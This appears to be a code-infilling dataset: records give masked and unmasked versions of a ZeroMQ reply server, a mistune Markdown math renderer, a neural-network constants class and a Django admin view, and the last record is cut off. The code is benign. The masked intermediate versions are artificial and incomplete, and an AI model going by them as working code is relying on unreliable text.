"step-4": "import time\nimport zmq\ncontext = zmq.Context()\nsocket = context.socket(zmq.REP)\nsocket.bind('tcp://10.20.32.221:5555')\nwhile True:\n message = socket.recv()\n print('Received request: %s' % message)\n time.sleep(1)\n socket.send(b'World')\n",
"step-5": "import time #melakukan import library time\nimport zmq #melakukan import library ZeroMQ\n\ncontext = zmq.Context() #melakukan inisialisasi context ZeroMQ pada variable context \nsocket = context.socket(zmq.REP) #menginisialisasikan socket(Reply) pada variable context(ZeroMQ)\nsocket.bind(\"tcp://10.20.32.221:5555\") #melakukan binding socket dengan port tcp 5555\n\nwhile True: #Looping selama kondisi benar\n\n message = socket.recv() #menampung pesan yang diterima oleh socket ke dalam variable message\n print(\"Received request: %s\" % message) #melakukan output dari message yang diterima\n\n\t# do some work\n time.sleep(1) #waktu interval untuk istirahat/melakukan proses berikutnya\n\n\n socket.send(b\"World\") #mengirim suatu pesan berupa bit pesan ('world') ke dalam socket\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MathBlockLexer(mistune.BlockLexer):
<|reserved_special_token_0|>
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MathBlockGrammar(mistune.BlockGrammar):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MathBlockLexer(mistune.BlockLexer):
default_rules = ['block_math', 'latex_environment'
] + mistune.BlockLexer.default_rules
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class HighlightRenderer(mistune.Renderer):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class MathBlockGrammar(mistune.BlockGrammar):
block_math = re.compile('^\\$\\$(.*?)\\$\\$', re.DOTALL)
latex_environment = re.compile(
'^\\\\begin\\{([a-z]*\\*?)\\}(.*?)\\\\end\\{\\1\\}', re.DOTALL)
class MathBlockLexer(mistune.BlockLexer):
default_rules = ['block_math', 'latex_environment'
] + mistune.BlockLexer.default_rules
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
import re
import mistune
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters import html
class HighlightRenderer(mistune.Renderer):
def block_code(self, code, lang):
if not lang:
return '\n<pre><code>%s</code></pre>\n' % mistune.escape(code)
try:
lexer = get_lexer_by_name(lang, stripall=True)
except pygments.util.ClassNotFound:
return '\n<pre><code>%s</code></pre>\n' % mistune.escape(code)
formatter = html.HtmlFormatter()
return pygments.highlight(code, lexer, formatter)
def block_math(self, text):
return '$$%s$$' % text
def latex_environment(self, name, text):
return '\\begin{%s}%s\\end{%s}' % (name, text, name)
def inline_math(self, text):
return '$%s$' % text
class MathBlockGrammar(mistune.BlockGrammar):
block_math = re.compile('^\\$\\$(.*?)\\$\\$', re.DOTALL)
latex_environment = re.compile(
'^\\\\begin\\{([a-z]*\\*?)\\}(.*?)\\\\end\\{\\1\\}', re.DOTALL)
class MathBlockLexer(mistune.BlockLexer):
default_rules = ['block_math', 'latex_environment'
] + mistune.BlockLexer.default_rules
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({'type': 'block_math', 'text': m.group(1)})
def parse_latex_environment(self, m):
self.tokens.append({'type': 'latex_environment', 'name': m.group(1),
'text': m.group(2)})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile('^\\$(.+?)\\$', re.DOTALL)
block_math = re.compile('^\\$\\$(.+?)\\$\\$', re.DOTALL)
text = re.compile('^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'], self.
token['text'])
<|reserved_special_token_1|>
# DISCLAIMER
# The "Math" code was taken from http://depado.markdownblog.com/2015-09-29-mistune-parser-syntax-highlighter-mathjax-support-and-centered-images
# The HighlightRenderer code was taken from https://github.com/rupeshk/MarkdownHighlighter
# MarkdownHighlighter is a simple syntax highlighter for Markdown syntax.
# The initial code for MarkdownHighlighter was taken from niwmarkdowneditor by John Schember
# Copyright 2009 John Schember, Copyright 2012 Rupesh Kumar
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
import re
import mistune
import pygments
from pygments.lexers import get_lexer_by_name
from pygments.formatters import html
class HighlightRenderer(mistune.Renderer):
def block_code(self, code, lang):
if not lang:
return '\n<pre><code>%s</code></pre>\n' % \
mistune.escape(code)
try:
lexer = get_lexer_by_name(lang, stripall=True)
except pygments.util.ClassNotFound:
return '\n<pre><code>%s</code></pre>\n' % \
mistune.escape(code)
formatter = html.HtmlFormatter()
return pygments.highlight(code, lexer, formatter)
# Pass math through unaltered - mathjax does the rendering in the browser
def block_math(self, text):
return '$$%s$$' % text
def latex_environment(self, name, text):
return r'\begin{%s}%s\end{%s}' % (name, text, name)
def inline_math(self, text):
return '$%s$' % text
class MathBlockGrammar(mistune.BlockGrammar):
block_math = re.compile(r"^\$\$(.*?)\$\$", re.DOTALL)
latex_environment = re.compile(
r"^\\begin\{([a-z]*\*?)\}(.*?)\\end\{\1\}", re.DOTALL)
class MathBlockLexer(mistune.BlockLexer):
default_rules = [
'block_math', 'latex_environment'] + mistune.BlockLexer.default_rules
def __init__(self, rules=None, **kwargs):
if rules is None:
rules = MathBlockGrammar()
super(MathBlockLexer, self).__init__(rules, **kwargs)
def parse_block_math(self, m):
"""Parse a $$math$$ block"""
self.tokens.append({
'type': 'block_math',
'text': m.group(1)
})
def parse_latex_environment(self, m):
self.tokens.append({
'type': 'latex_environment',
'name': m.group(1),
'text': m.group(2)
})
class MathInlineGrammar(mistune.InlineGrammar):
math = re.compile(r"^\$(.+?)\$", re.DOTALL)
block_math = re.compile(r"^\$\$(.+?)\$\$", re.DOTALL)
text = re.compile(r'^[\s\S]+?(?=[\\<!\[_*`~$]|https?://| {2,}\n|$)')
class MathInlineLexer(mistune.InlineLexer):
default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules
def __init__(self, renderer, rules=None, **kwargs):
if rules is None:
rules = MathInlineGrammar()
super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)
def output_math(self, m):
return self.renderer.inline_math(m.group(1))
def output_block_math(self, m):
return self.renderer.block_math(m.group(1))
class MarkdownWithMath(mistune.Markdown):
def __init__(self, renderer, **kwargs):
if 'inline' not in kwargs:
kwargs['inline'] = MathInlineLexer
if 'block' not in kwargs:
kwargs['block'] = MathBlockLexer
super(MarkdownWithMath, self).__init__(renderer, **kwargs)
def output_block_math(self):
return self.renderer.block_math(self.token['text'])
def output_latex_environment(self):
return self.renderer.latex_environment(self.token['name'],
self.token['text'])
|
flexible
|
{
"blob_id": "a6c45ab3df0a692cd625d8203e1152e942a4cd6c",
"index": 5908,
"step-1": "<mask token>\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n <mask token>\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-2": "<mask token>\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n <mask token>\n <mask token>\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = ['block_math', 'latex_environment'\n ] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-3": "<mask token>\n\n\nclass HighlightRenderer(mistune.Renderer):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n block_math = re.compile('^\\\\$\\\\$(.*?)\\\\$\\\\$', re.DOTALL)\n latex_environment = re.compile(\n '^\\\\\\\\begin\\\\{([a-z]*\\\\*?)\\\\}(.*?)\\\\\\\\end\\\\{\\\\1\\\\}', re.DOTALL)\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = ['block_math', 'latex_environment'\n ] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-4": "import re\nimport mistune\nimport pygments\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\nclass HighlightRenderer(mistune.Renderer):\n\n def block_code(self, code, lang):\n if not lang:\n return '\\n<pre><code>%s</code></pre>\\n' % mistune.escape(code)\n try:\n lexer = get_lexer_by_name(lang, stripall=True)\n except pygments.util.ClassNotFound:\n return '\\n<pre><code>%s</code></pre>\\n' % mistune.escape(code)\n formatter = html.HtmlFormatter()\n return pygments.highlight(code, lexer, formatter)\n\n def block_math(self, text):\n return '$$%s$$' % text\n\n def latex_environment(self, name, text):\n return '\\\\begin{%s}%s\\\\end{%s}' % (name, text, name)\n\n def inline_math(self, text):\n return '$%s$' % text\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n block_math = re.compile('^\\\\$\\\\$(.*?)\\\\$\\\\$', re.DOTALL)\n latex_environment = re.compile(\n '^\\\\\\\\begin\\\\{([a-z]*\\\\*?)\\\\}(.*?)\\\\\\\\end\\\\{\\\\1\\\\}', re.DOTALL)\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = ['block_math', 'latex_environment'\n ] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({'type': 'block_math', 'text': m.group(1)})\n\n def parse_latex_environment(self, m):\n self.tokens.append({'type': 'latex_environment', 'name': m.group(1),\n 'text': m.group(2)})\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile('^\\\\$(.+?)\\\\$', re.DOTALL)\n block_math = re.compile('^\\\\$\\\\$(.+?)\\\\$\\\\$', re.DOTALL)\n text = re.compile('^[\\\\s\\\\S]+?(?=[\\\\\\\\<!\\\\[_*`~$]|https?://| {2,}\\\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'], self.\n token['text'])\n",
"step-5": "# DISCLAIMER\n# The \"Math\" code was taken from http://depado.markdownblog.com/2015-09-29-mistune-parser-syntax-highlighter-mathjax-support-and-centered-images\n# The HighlightRenderer code was taken from https://github.com/rupeshk/MarkdownHighlighter\n\n\n# MarkdownHighlighter is a simple syntax highlighter for Markdown syntax.\n# The initial code for MarkdownHighlighter was taken from niwmarkdowneditor by John Schember\n# Copyright 2009 John Schember, Copyright 2012 Rupesh Kumar\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n\n\nimport re\nimport mistune\nimport pygments\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\nclass HighlightRenderer(mistune.Renderer):\n\n def block_code(self, code, lang):\n if not lang:\n return '\\n<pre><code>%s</code></pre>\\n' % \\\n mistune.escape(code)\n try:\n lexer = get_lexer_by_name(lang, stripall=True)\n except pygments.util.ClassNotFound:\n return '\\n<pre><code>%s</code></pre>\\n' % \\\n mistune.escape(code)\n\n formatter = html.HtmlFormatter()\n return pygments.highlight(code, lexer, formatter)\n\n # Pass math through unaltered - mathjax does the rendering in the browser\n def block_math(self, text):\n return '$$%s$$' % text\n\n def latex_environment(self, name, text):\n return r'\\begin{%s}%s\\end{%s}' % (name, text, name)\n\n def inline_math(self, text):\n return '$%s$' % text\n\n\nclass MathBlockGrammar(mistune.BlockGrammar):\n block_math = re.compile(r\"^\\$\\$(.*?)\\$\\$\", re.DOTALL)\n latex_environment = re.compile(\n r\"^\\\\begin\\{([a-z]*\\*?)\\}(.*?)\\\\end\\{\\1\\}\", re.DOTALL)\n\n\nclass MathBlockLexer(mistune.BlockLexer):\n default_rules = [\n 'block_math', 'latex_environment'] + mistune.BlockLexer.default_rules\n\n def __init__(self, rules=None, **kwargs):\n if rules is None:\n rules = MathBlockGrammar()\n super(MathBlockLexer, self).__init__(rules, **kwargs)\n\n def parse_block_math(self, m):\n \"\"\"Parse a $$math$$ block\"\"\"\n self.tokens.append({\n 'type': 'block_math',\n 'text': m.group(1)\n })\n\n def parse_latex_environment(self, m):\n self.tokens.append({\n 'type': 'latex_environment',\n 'name': m.group(1),\n 'text': m.group(2)\n })\n\n\nclass MathInlineGrammar(mistune.InlineGrammar):\n math = re.compile(r\"^\\$(.+?)\\$\", re.DOTALL)\n block_math = re.compile(r\"^\\$\\$(.+?)\\$\\$\", re.DOTALL)\n text = re.compile(r'^[\\s\\S]+?(?=[\\\\<!\\[_*`~$]|https?://| {2,}\\n|$)')\n\n\nclass MathInlineLexer(mistune.InlineLexer):\n default_rules = ['block_math', 'math'] + mistune.InlineLexer.default_rules\n\n def __init__(self, renderer, rules=None, **kwargs):\n if rules is None:\n rules = MathInlineGrammar()\n super(MathInlineLexer, self).__init__(renderer, rules, **kwargs)\n\n def output_math(self, m):\n return self.renderer.inline_math(m.group(1))\n\n def output_block_math(self, m):\n return self.renderer.block_math(m.group(1))\n\n\nclass MarkdownWithMath(mistune.Markdown):\n def __init__(self, renderer, **kwargs):\n if 'inline' not in kwargs:\n kwargs['inline'] = MathInlineLexer\n if 'block' not in kwargs:\n kwargs['block'] = MathBlockLexer\n super(MarkdownWithMath, self).__init__(renderer, **kwargs)\n\n def output_block_math(self):\n return self.renderer.block_math(self.token['text'])\n\n def output_latex_environment(self):\n return self.renderer.latex_environment(self.token['name'],\n self.token['text'])\n",
"step-ids": [
15,
17,
19,
24,
25
]
}
|
[
15,
17,
19,
24,
25
] |
import numpy as np
class Constants():
DNN_DEFAULT_ACTIVATION = 'relu'
DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-5]
DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-5]
DNN_DEFAULT_LOSS = 'mean_squared_error'
DNN_DEFAULT_VALIDATION_SPLIT = 0.2
DNN_DEFAULT_EPOCHS = 100
DNN_DEFAULT_CHECKPOINT_PERIOD = 100
DNN_DEFAULT_VALIDATION_PERIOD = 1
DNN_DEFAULT_PATIENCE = 1000
DNN_DEFAULT_BATCH_SIZE = 16
DNN_DEFAULT_OPTIMIZER = 'adam'
DNN_DEFAULT_DROPOUT_RATE = 0.02
DNN_DEFAULT_DECAY = 0
DNN_DEFAULT_BIAS = 0.1
DNN_DEFAULT_OUTPUT_BIAS = 0.5
|
normal
|
{
"blob_id": "b2bb7393bf7955f5de30c59364b495b8f888e178",
"index": 4073,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Constants:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Constants:\n DNN_DEFAULT_ACTIVATION = 'relu'\n DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_LOSS = 'mean_squared_error'\n DNN_DEFAULT_VALIDATION_SPLIT = 0.2\n DNN_DEFAULT_EPOCHS = 100\n DNN_DEFAULT_CHECKPOINT_PERIOD = 100\n DNN_DEFAULT_VALIDATION_PERIOD = 1\n DNN_DEFAULT_PATIENCE = 1000\n DNN_DEFAULT_BATCH_SIZE = 16\n DNN_DEFAULT_OPTIMIZER = 'adam'\n DNN_DEFAULT_DROPOUT_RATE = 0.02\n DNN_DEFAULT_DECAY = 0\n DNN_DEFAULT_BIAS = 0.1\n DNN_DEFAULT_OUTPUT_BIAS = 0.5\n",
"step-4": "import numpy as np\n\n\nclass Constants:\n DNN_DEFAULT_ACTIVATION = 'relu'\n DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-05]\n DNN_DEFAULT_LOSS = 'mean_squared_error'\n DNN_DEFAULT_VALIDATION_SPLIT = 0.2\n DNN_DEFAULT_EPOCHS = 100\n DNN_DEFAULT_CHECKPOINT_PERIOD = 100\n DNN_DEFAULT_VALIDATION_PERIOD = 1\n DNN_DEFAULT_PATIENCE = 1000\n DNN_DEFAULT_BATCH_SIZE = 16\n DNN_DEFAULT_OPTIMIZER = 'adam'\n DNN_DEFAULT_DROPOUT_RATE = 0.02\n DNN_DEFAULT_DECAY = 0\n DNN_DEFAULT_BIAS = 0.1\n DNN_DEFAULT_OUTPUT_BIAS = 0.5\n",
"step-5": "import numpy as np\n\nclass Constants():\n DNN_DEFAULT_ACTIVATION = 'relu'\n DNN_DEFAULT_KERNEL_REGULARIZATION = [0, 5e-5]\n DNN_DEFAULT_BIAS_REGULARIZATION = [0, 5e-5]\n DNN_DEFAULT_LOSS = 'mean_squared_error'\n DNN_DEFAULT_VALIDATION_SPLIT = 0.2\n DNN_DEFAULT_EPOCHS = 100\n DNN_DEFAULT_CHECKPOINT_PERIOD = 100\n DNN_DEFAULT_VALIDATION_PERIOD = 1\n DNN_DEFAULT_PATIENCE = 1000\n DNN_DEFAULT_BATCH_SIZE = 16\n DNN_DEFAULT_OPTIMIZER = 'adam'\n DNN_DEFAULT_DROPOUT_RATE = 0.02\n DNN_DEFAULT_DECAY = 0\n DNN_DEFAULT_BIAS = 0.1\n DNN_DEFAULT_OUTPUT_BIAS = 0.5",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render, redirect
from datetime import datetime
from fichefrais.models import FicheFrais, Etat, LigneFraisForfait, LigneFraisHorsForfait, Forfait
def home_admin(request):
"""
:view home_admin: Menu principale des Administrateurs
:template home_admin.html:
"""
if not request.user.is_authenticated():
return redirect("login")
title = "Accueil"
today = datetime.now()
etat = Etat.objects
fiche_frais = FicheFrais.objects
frais_forfait = Forfait.objects
lignes_frais_forfait = LigneFraisForfait.objects
lignes_frais_hors_forfait = LigneFraisHorsForfait.objects
context = {
"title": title,
"user": request.user,
"fiche_frais": fiche_frais,
"lignes_frais_forfait": lignes_frais_forfait,
"lignes_frais_hors_forfait": lignes_frais_hors_forfait,
"etat": etat,
"today": today,
"frais_forfait": frais_forfait,
}
return render(request, "fichefrais/administrateur/home_admin.html", context)
|
normal
|
{
"blob_id": "b453c8e9cc50066d1b5811493a89de384a000f37",
"index": 4929,
"step-1": "<mask token>\n",
